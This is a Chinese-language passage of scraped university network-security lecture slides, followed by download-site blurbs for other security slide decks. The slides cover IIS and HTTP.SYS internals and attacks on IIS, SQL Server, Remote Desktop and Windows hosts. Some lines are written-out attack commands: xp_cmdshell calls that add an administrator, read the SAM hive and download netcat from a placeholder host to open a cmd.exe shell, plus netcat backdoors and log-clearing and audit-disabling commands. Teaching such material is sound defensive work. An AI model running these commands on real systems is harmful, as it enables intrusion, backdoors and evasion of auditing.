一个内核模式网络驱动程序。从结构上来讲，HTTP.SYS是位于TCPIP.SYS之上的。一个请求首先由TCPIP.SYS处理，然后才转发到HTTP.SYS上；同理，该请求被Web应用程序处理后作为响应返回时则是先到达HTTP.SYS在转发到TCPIP.SYS最后到达客户端浏览器。 TCPIP.SYS和HTTP.SYS都处于内核模式下。 HTTP.SYS功能特点(1) 监听用户（来自于TCPIP.SYS）的HTTP请求。 验证HTTP请求。 URL和Header长度等如果验证没有通过则直接返回否则将WEB请求放到适当请求队 列中，并对其进行排队。 HTTP.SYS功能特点(2) 路由HTTP请求到正确的WEB应用程序池。 HTTP.SYS中维护着一个从URL到WEB应用程序池的对应关系路由表（映射表），所以HTTP.SYS可以迅速将WEB请求转发到web应用程序。如果WEB请求没找到相应的映射，则返回404错误，即常见的那个并不雅观的页面。也可以自己画一个漂亮的将这个页面覆盖掉。安全性有吗？ HTTP.SYS功能特点(3) 缓存web应用程序对于该请求的响应结果。当同一请求被频繁访问时可以不必转发到Web应用程序，直接从此缓存中将结果返回给用户，大大提高了其响应速度。 实现比如连接限制、连接超时、消息队列长度限制以及IIS宽带限制等控制。 WEB应用程序池 WWW Admin Service (WAS) 一个管理和监视工作进程的组件，位于它宿主在SveHost.exe中，运行在用户模式下。当运行IIS的InetInfo.exe服务启动后，WAS服务(SvcHost.exe)也随之启动。此时WAS从InetInfo的MeteBase中读取配置信息并且初始化HTTP.SYS中的Namespace路由表(Namespace mapper)，HTTP.SYS通过路由表中的数据条目来判定Web请求的URL所对应的应用程序池。此时，HTTP.SYS就会向WEB应用程序池发出启动工作进程的指令。。 工作进程(W3WP.EXE) 一个用户模式下负责处理WEB请求的程序，如处理返回静态页的请求，调用ISAPI扩展或ISAPI筛选器，运行CGI(Common Gateway Interface)。工作进程接收来自HTTP.SYS的WEB请求和向HTTP.SYS发送该请求的WEB响应。同时也会运行WEB应用程序代码，比如Asp.net Application和XML Web Service。工作进程主要通过程序集W3Core.DLL来实现所有WEB请求的处理逻辑。 WEB请求的整体流程步骤1 HTTP.SYS收到来自客户端浏览器的WEB请求后，判断请求的类型（HTTP或HTTPS），如果请求类型为HTTPS，HTTP.SYS会把这个请求放置到LSASS.EXE中的SSL队列。对于SSL请求，HTTPFilter会执行下面的步骤： 1) 监听被添加到SSL队列的请求 2) 从SSL队列中取出请求 3) 通过SSL解密来自HTTP.SYS的请求 4) 将解密后的请求返回给HTTP.SYS等待处理。步骤2 HTTP.SYS判断请求的有效性。如果请求无效，则会直接返回400的错误页至客户端；如果请求有效，HTTP.SYS会检查在Response Cache是否已经存在针对该请求的响应。 步骤3 HTTP.SYS检查Response Cache： 1) 如果响应存在，则立即返回响应而不必将请求转发到用户模式下的工作进程处理。 2) 如果响应不存在，HTTP.SYS会根据namespace Map映射表来判定将该请求放到哪个应用程序池对应的队列中，然后将请求放入此队列。 3) 如果没找到该应用程序池对应的队列，或者这个队列已经满了，HTTP.SYS会返回一个503的错误页给客户端。步骤4 当请求放置到队列后，HTTP.SYS会查看有没有有效的且可以启动的工作进程，如果没有，HTTP.SYS会告诉WAS(svchost.exe)启动一个工作进程(w3wp.exe)。 步骤5 启动工作进程过程中会在启动工作进程的过程中加载相应的ISAPI（非托管代码）以及CLR（托管代码）、创建应用程序域等操作。然后从HTTP.SYS的请求队列中取出该web请求进行相应的处理。 步骤6 将根据请求得到的web响应结果返回给HTTP.SYS并指示HTTP.SYS是否将该响应缓存到Response Cache。步骤7 HTTP.SYS判断响应类型(HTTP或HTTPS)，如果是HTTPS类型的响应，HTTP.SYS就会将请求放到HTTP SSL(HTTPFilter)的队列中。对于SSL响应，即HTTPS类型的响应，HTTP SSL(HTTPFilter)会按以下步骤执行： 1) 监听放入SSL队列的响应 2) 取出放入SSL队列的响应 3) 通过SSL加密响应 4) 将加密后的响应返回给HTTP.SYS 步骤8 HTTP.SYS将响应结果返回给客户端并记录针对该响应的请求（如果可以记录的话）。如果有相同请求进来的话，会直接将其响应结果从Response Cache中去出来返回给客户端，加快WEB请求的响应速度。攻击Windows因特网服务: IIS IIS6之前曾是臭名昭著充斥安全漏洞进攻路线：信息泄漏、目录遍历、缓冲区溢出信息泄漏：MS01-004， MS00-006， MS00-058， WebDAV Search， … 目录遍历：古老技术../ IIS 2.0， Unicode编码， MS00-086/MS01-026(绿盟)， … 缓冲区溢出：MS04-011， MS04-036， … IIS6推出后安全性得到大幅提升，仍存安全漏洞 MS08-006， MS07-041 IIS7.0的漏洞公告 IIS7.5的漏洞公告 IIS攻击手段通用防范措施及时打系统补丁禁用用不着的ISAPI功能扩展模块和过滤器单独文件卷上部署虚拟根目录使用NTFS文件系统禁用不必要的服务根据MS提供的IIS安全核对清单(Check List) 利用IIS Lockdown等增强IIS服务安全性使用Web服务器安全评估工具了解和修补安全威胁攻击MS SQL Server SQL Server信息收集端口扫描: TCP 1433端口 SQLPing: SQL服务器名称/实例名称/版本号/端口号/命名管道 SQL Server黑客工具和技术基本SQL查询工具: Query Analyzer， osql命令行 SQL口令破解: sqldict， sqlbf， sqlpoke 嗅探SQL Server口令字: SQL Server明文传输口令字(XOR编码) Web服务器源代码泄漏: 泄漏连接字符串(包含口令字) 攻击已知SQL Server漏洞 SQL注入攻击已知SQL Server漏洞 SQL Server 2K解析服务缓冲区溢出漏洞 David Litchfield， MS02-039 2003年1月: SQL Slammer蠕虫基于UDP， 376字节单数据包: 集成目标地址生成，漏洞攻击，自身传播等模块第一个带宽限制型蠕虫，10分钟扫遍几乎攻陷全部存有漏洞主机，75K台主机受感染扩展存储过程输入参数分析漏洞: MS00-092 存储过程权限漏洞: MS00-048 SQL查询滥用漏洞: MS00-014 特权提升漏洞: MS08-040 MS SQL Server 2008 R2 for 32-bit Systems 利用SQL扩展存储过程操纵目标扩展存储过程(extended stored procedure， XP) 黑客最青睐的SQL Server XP: xp_cmdshell SQL Server运行在LocalSystem帐户环境下: 最高权限，没有什么事是它不能做的！利用SQL扩展存储过程操作目标系统添加Admin帐户: xp_cmdshell „net user found stone /ADD‟ xp_cmdshell „net localgroup /ADD Administrators found‟ 读取Administrator帐户口令密文: Administrator无法访问 xp_regread „HKEY_LOCAL_MACHINE‟， „SECURITY\SAM\Domains\Account\Users\000001F4‟，‟F‟ 利用SQL扩展存储过程操纵目标利用SQL扩展存储过程上传后门 EXEC xp_cmdshell „echo open xxx.xxx.xxx.xxx > ftptemp‟ EXEC xp_cmdshell „echo user anonymous xxx@xx.com >> ftptemp‟ EXEC xp_cmdshell „echo bin >> ftptemp‟ EXEC xp_cmdshell „echo get nc.exe >> ftptemp‟ EXEC xp_cmdshell „echo bye >> ftptemp‟ EXEC xp_cmdshell „ftp -n –s:ftptemp‟ EXEC xp_cmdshell „erase ftptemp‟ EXEC xp_cmdshell „start nc -L -d -p 2002 -e cmd.exe‟ nc -vv xxx.xxx.xxx.xxx 2002 获得远程访问shell MS SQL Server防范措施发现网络上的所有SQL Server SQLPing， SQL Scan(MS)等阻断不可信客户对SQL Server端口的访问配置防火墙规则及时打好补丁 Windows Update并不具备自动搜索和实施SQL Server补丁的功能网管应关注SQL Server的Service Pack和Hotfix，并进行升级和补丁修补强口令字，特别是sa帐户尽可能使用Windows Only身份验证模式 MS Terminal Services(远程桌面) 服务器远程管理桌面: 桌面操作系统Win2K Pro， WinXP 终端服务: Win2K中称为应用服务器远程桌面协议 RDP (Remote Desktop Protocol): TCP 3389 客户端 RDC (Remote Desktop Connection) Run “mstsc” 远程桌面Web连接(RDWC: Remote Desktop Web Connection)： ActiveX/COM对象，嵌入浏览器的客户程序，通过RDP连接服务器攻击“远程桌面” 寻找和探查远程桌面通过搜索引擎查找RDWC: TSWeb\default.htm 通过TCP 3389端口寻找远程桌面服务非标准端口的远程桌面查找 ProbeTS， TSEnum， 终端服务管理器攻击远程桌面猜测口令字 TSGrinder2， TSCrack 窃听攻击 RDP加密实现缺陷MS02-051 “远程桌面”基本安全原则使用强口令字设置帐户锁定阈值(虽然对远程桌面交互式登录无效)，设置登录警告升级/跟进补丁服务器操作系统: 升级至Windows Server 2008 桌面操作系统: 必要时才开放“远程协助” “Remote Desktop Users”用户组使用组策略管理RDU用户组权限软件限制策略（限制特定用户组能够使用哪些应用程序）终端服务的严格配置 Windows本地攻击 Windows本地攻击本地权限提升(特权提升) 破解本地安全漏洞破解口令字窃取敏感信息掩踪灭迹远程控制和后门破解漏洞进行本地权限提升 Guest→Administrator getadmin系列针对NT4的权限提升攻击工具基本技术：“DLL注入” 假造LPC端口请求: MS00-003 命名管道预知: MS00-053 NetDDE服务漏洞: MS01-007 Windows调试器攻击: MS03-013 破解漏洞进行本地权限提升 DLL 注入（1） DLL：动态链接库封装大量函数，实现模块化的工程管理。提供API接口，调用前需要事先引用、声明，也可以动态的加载。需要载入DLL，获取函数地址然后才能调用。 恶意代码编写质量的好坏取决于其隐藏程度。如果是EXE文件，则将会产生一个进程，很容易发现。可以选择为 DLL 文件，DLL 文件加载到进程的地址空间中，不会有进程名。 DLL文件如果不被进程加载又如何在进程中？强制让某进程加载DLL文件，即创建远程线程将DLL注入到某个指定的进程中。 DLL注入（2）把DLL “写入”另一个程序的运行空间去。 EXE在启动时需要加载很多DLL，内存中这些DLL和EXE所在的地址空间是不一样的，而只有加载进一个DLL，系统才会为这个DLL分配地址和空间。实际上，强行让另一个EXE载入（装载）这个DLL。 DLL注入（3） DLL注入的目的主要是通过一个外部的、第三方的手段来让另一个程序执行作者并没有意图加入EXE的功能。外挂、程序修改器、曾经的杀毒软件木马、病毒 正常使用的DLL注入有什么好处？作为一个外挂（外部挂接）程序来修改其他程序的内容。作为监控程序监控另一个程序的运行情况。 DLL注入（4）恶意使用的DLL注入有什么好处？一旦注入正常程序，例如svchost.exe，杀毒软件监控到的恶意操作的发起者就可能是这个正常程序，有白名单的杀毒软件可能会放行。用户看到正常程序正在进行可疑操作的时候有可能会点击杀毒软件的放行从而让病毒得逞。 Windows自带的防火墙并不会阻止可信程序发起的网络连接，而这个可信程序仅仅是通过文件名来判断的。 DLL注入的方法（1） HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs里面的DLL会被加载到几乎每个进程中，只要进程加载user32.dll，这里面的DLL就会同时附载到那个进程上。 user32.dll是Windows用户API接口的链接库(Windows User API Client DLL)，几乎每个程序都会用到它。 从Vista起，这个键值由于安全问题，默认是被禁止的。 Windows 7起，包括Windows 8 R2，这个键值被RequireSignedAppInit_DLLs 取代，虽然加载DLL，但是只能加载带有数字签名的DLL。 DLL注入的方法（2）进程使用CreateRemoteThread和类似的函数则可在运行时注入DLL。 1、获取目标进程的句柄。 2、在目标进程中分配一定内存，把要注入的DLL名称写进去。当然，这一步也可能省略，如果加载一个名为？32.dll的dll，就不必写入内存，也可以绕过部分监控软件。 3、在目标进程中建立一个新线程，然后起始地址设置为LoadLibrary的地址，参数设置为刚才写入的那个dll名称。也可以直接在线程开始写入可执行代码。 4、注入成功，现在操作系统就会调用DLLMain函数了。 DLL注入的方法（3）使用SetWindowsHookEx之类的Windows钩子调用。 使用调试功能（Debugging）暂停所有线程，然后劫持一个存在的线程，再用它执行注入代码。 使用Windows程序中的字符限制漏洞来利用LoadLibrary函数加载DLL。获取口令字密文口令字密文位置 NT4之前：SAM安全帐户管理器 %systemroot%\system32\config\SAM 操作系统运行期间锁定，即使Admin帐户也不能随意查看和修改 Windows 2000/XP/2003: 活动目录 %windir%\WindowsDS\ntds.dit 默认大小10MB，加密格式获取口令字密文的基本套路另一操作系统启动－拷贝密文文件：物理访问硬盘修复工具包rdisk创建SAM备份文件拷贝: rdisk /s- 窃听Windows系统身份验证过程(网络监听LanMan密文) 直接从SAM文件或活动目录直接提取口令字密文直接提取口令字密文 pwdump (Jeremy Allison): 最早针对NT4 SAM直接提取口令字密文要求admin权限 NT4 SP2增强策略: SYSKEY机制 pwdump2(Todd Sabin): DLL注入方法将本身代码加载到另一高优先级进程空间要求admin权限， samdump.dll库文件 Windows 2000/XP/2003: 活动目录 pwdump2的改进版本 pwdump3e改进版本: 通过SMB远程提取口令字密文破解口令字 L0phtcrack工具多种导入SAM数据方式: 本地注册表、原始SAM文件、SAM备份文件、网络监听口令字密文、L0phtcrack数据文件、pwdumpX输出文件字典破解、蛮力破解、混合式破解分布式破解: 并行破解 LanMan密文破解: 最早被破解 John the Ripper 免费破解Unix/Linux、Window LanMan口令字缺陷：只能破解LanMan密文窃取敏感信息-登录口令 LSADump LSA Secrets将登录其他系统的资料未经加密存放在本地系统. 某些服务帐户的明文口令字最新10位用户的口令字密文缓存 FTP、Web用户明文口令字 Remote Access Service拨号帐户名字和口令字用来访问域控制器的计算机帐户口令字 lsadump2利用DLL注入提取LSA Secrets内容 查看登录信息缓存区 10个最近登录用户的口令字密文: HKLM\SECURITY\CACHE\NL$n CacheDump， cachebf 窃取敏感信息-用户数据用户文件－文件搜索 find工具：find “password”*.txt findstr grep: Windows Resource Kit 用户输入键击记录器: keylogger (IKS， …) 抓屏监控: 网银木马 GINA木马: 木马化登录界面，窃取登录用户密码 FakeGINA 用户程序信息：软件License， QQ/网络游戏“信封”， … 盗号木马网络交换信息：明文密码等 snort/Snifferpro/tshark， fsniff/dsnif Windows掩踪灭迹关闭审计功能查看目标系统的审计策略管理审计功能: Resource Kit中的auditpol auditpol /disable 干完坏事后auditpol /enable恢复审计功能清理事件日志 elsave工具－清除事件日志 elsave -s \\HOST -l “Security”–C Windows掩踪灭迹(2) 隐藏文件隐藏属性: attrib +h

NTFS文件流隐藏：cp HOSTFILE: 提取：cp HOSTFILE: 隐藏文件防范措施修改资源浏览器配置，查看所有资源 Windows远程控制和后门命令行远程控制 TCP/IP瑞士军刀-netcat 服务器端(目标主机): nc -L -d -e cmd.exe -p PORT 客户端(攻击机): nc HOST PORT 通过SMB服务-psexec psexec \\HOST -u admin_user -p pass comm 图形化远程控制 Windows远程桌面-TCP 3389 VNC: 服务器端WinVNC， 服务器端VNCViewer 商业软件: RemoteAdmin， PCAnywhere 国产软件: 冰河、灰鸽子 Windows远程控制和后门端口重定向-绕过防火墙过滤 fpipe: TCP源端口转发/重定向工具 fpipe -v -l 53 -r 23 HOST 将TCP 53端口上的通信转发给23端口telnet 可以指定源端口后门藏身之地: ASEP－自启动扩展点注册表启动项 HKLM\SOFTWARE\Microsoft\Window\CurrentVersion\Run， RunOnce … 启动子目录 … CpN红软基地

网络信息安全论文PPT作品：这是一个关于网络信息安全论文PPT作品，主要介绍网络安全？谁关注安全？网络信息安全主讲：唐屹 博士 教授办公室：行政西前座440室电话：13808876629 谁关注安全？政府？谁关注安全？机构？谁关注安全？个人？谁关注安全？大家都关注！区别只是角度不一样！我们这个课程也关注！希望通过72学时，能够关注并了解基本的网络安全攻防技术 基本的系统安全攻防技术 基本的Web安全攻防技术当然，没有攻击，就没有防御。要了解网络攻防技术攻是第一位的你不会攻击，并不意味着别人不会攻击你不知道攻击的途径，你又怎么知道如何防御呢？但是，法律，法规…… 教学方式与考试要求课堂教学信息安全技术实验项目杜绝抄袭成绩计算 70%考试成绩 20%信息安全技术实验 10%考勤参考资料虽然有本很实用的教材，但依然需要与时俱进，欢迎点击下载网络信息安全论文PPT作品哦。

网络信息安全的重要性PPT作品：这是一个关于网络信息安全的重要性PPT作品，主要介绍了什么是信息、什么是网络、什么是网络信息安全、学科内容、授课内容等内容。网络信息安全绪论：什么是网络信息安全本节内容什么是信息什么是网络什么是网络信息安全学科内容授课内容什么是信息科学家说：信息是不确定性的减少，是负熵老百姓说：信息是让你知道些什么的东西安全专家说：信息是一种资产，它意味着一种风险老百姓说：不怕贼偷，就怕贼惦记信息内容和信息载体信息内容和信息载体的关系，好比灵魂和肉体的关系同一个内容，可以用多种载体承载不同的内容，可以用同一载体承载信息可以被—— 创建输入存储输出传输（发送，接收，截取）处理（编码，解码，计算）销毁 一个例子: S先生和P先生的故事一个例子: S先生和P先生的故事信息的要害是改变知识状态什么是网络网络确保信息按需有序流动的基础设施传输网络基础电信网、基础广电网互联网络互联网（因特网）、内联网、外联网人际网络关系网、销售网、间谍网什么是安全 Security: 信息的安全 Safety: 物理的安全 Security的含义在有敌人（Enemy）/对手（Adversary）/含敌意的主体（Hostile Agent）存在的网络空间中，确保己方的信息、信息系统和通信不受窃取和破坏，按照需要对敌方的信息、信息系统和通信进行窃取和破坏的“机制”（Mechanism）什么是网络信息安全在网络环境下信息资产（信息、信息系统、通信）的可能面临的风险的评估、防范、应对、化解措施。技术措施（采用特定功能的设备或系统）管理措施（法律、规章制度、检查）三分技术七分管理网络信息安全的要害网络信息安全的要害就是防止通过改变知识状态来造成不希望的后果对信息进行窃取，会使窃取者知道信息拥有者不希望他知道的事情对信息进行破坏，会使信息的拥有者失去对信息的拥有，不再知道他本来知道的事情背景网络的普及对网络的依赖加深攻击的门槛降低攻击资源的广泛存在实施攻击的难度大大降低维护国家主权和社会稳定、打击网上犯罪、引导青少年健康上网（过滤与监控）网络信息资源的综合利用（情报获取与分析）网络信息对抗和网络信息战网络信息安全的CIA模型，欢迎点击下载网络信息安全的重要性PPT作品哦。

企业网络信息安全的重要性PPT：这是一个关于企业网络信息安全的重要性PPT，主要介绍了企业信息网络安全问题概述、企业信息网络安全分析、市场竞争需要加强信息安全管理、如何解决企业信息网络安全问题、重点要解决的问题、内网安全监控软件介绍、产品种类及服务介绍等内容。如何加强 企业信息网络安全管理 融信科技 程孝龙合作方：公安部第三研究所信息网络安全研发中心国家反计算机入侵和防病毒研究中心一、企业信息网络安全问题概述 信息是一种资源。客户信息、财务信息、人事信息和技术信息等对一个企业来说是十分重要的。信息与物质和能量一起构成企业生存和发展的基础。电脑网络、办公自动化、电子政务带来高效、方便。也带来信息安全问题。 在处理、使用和保存信息的过程中存在那些不可忽略的安全问题？例如：对内部网络的电脑上网、聊天、游戏等行为难以管理。对机密文件上传下载等管理漏洞较大。经常存在恶意代码、病毒和黑客的攻击。不能及时进行漏洞扫描和补丁管理。二、企业信息网络安全分析 随之而来的网络攻击、数据泄密、客户资料被窃、办公室变成网上游乐场、计算机黑客或病毒入侵公司，以及电邮泛滥等问题和事件时有发生。那么如何才能充分满足对机密数据的安全防护和电脑非法行为的监控与管理？ 目前我国有几十万个政府机关和大中型企业都在思考，如何才能很好地解决内网的安全监控管理问题。尤其象各级党政机关、军队、金融、公安、电信、民航、铁路、交通、大中型企业等用户的需求更为迫切，欢迎点击下载企业网络信息安全的重要性PPT哦。